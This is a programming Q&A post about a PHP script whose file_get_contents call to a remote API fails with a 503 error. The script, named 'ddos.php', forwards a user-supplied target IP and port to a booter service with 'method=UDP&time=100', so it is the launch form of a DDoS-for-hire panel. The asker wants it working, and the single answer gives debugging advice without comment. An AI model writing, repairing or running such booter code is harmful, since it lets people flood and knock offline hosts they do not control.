# file_get_contents not working with cloudflare

Tags: php, file-get-contents, cloudflare

I am having problems using file_get_contents function with an API.

Current PHP code:

```
<?php
ini_set('display_errors',1); error_reporting(E_ALL); 
if(isset($_POST['resolve'])){
$api = "http://lolwut.pw/send.php?key=lKEYHEREodghusrwqz&host=";
$api2 = "&port=";
$api3 = "&method=UDP&time=100";



if(strlen($_POST['ip'])==0){
echo "fill in all fields!";
} else {



echo  "".htmlentities(file_get_contents($api.$_POST['ip'].$api2.$_POST['port'].$api3));

}
}
?>
```

Using "ini_set('display_errors',1); error_reporting(E_ALL); " at the top of the code I get this returned:

"Warning: file_get_contents(http://lolwut.pw/send.php?key=lj9KEYHERE...time=100): failed to open stream: HTTP request failed! HTTP/1.1 503 Service Temporarily Unavailable in /var/www/html/login/ddos.php on line 311"

I asked the site support and we both came to the conclusion that is was cloudflare causing this issue.

Answer (score 0):

As your warning says the server where lolwut.pw are hosted is Temporarily Unavailable. Check if you can enter with a browser to

> http://lolwut.pw/send.php?key=lj9KEYHERE...time=100

Comment: I just replaced the url with lolwut. Using the API in a browser works fine.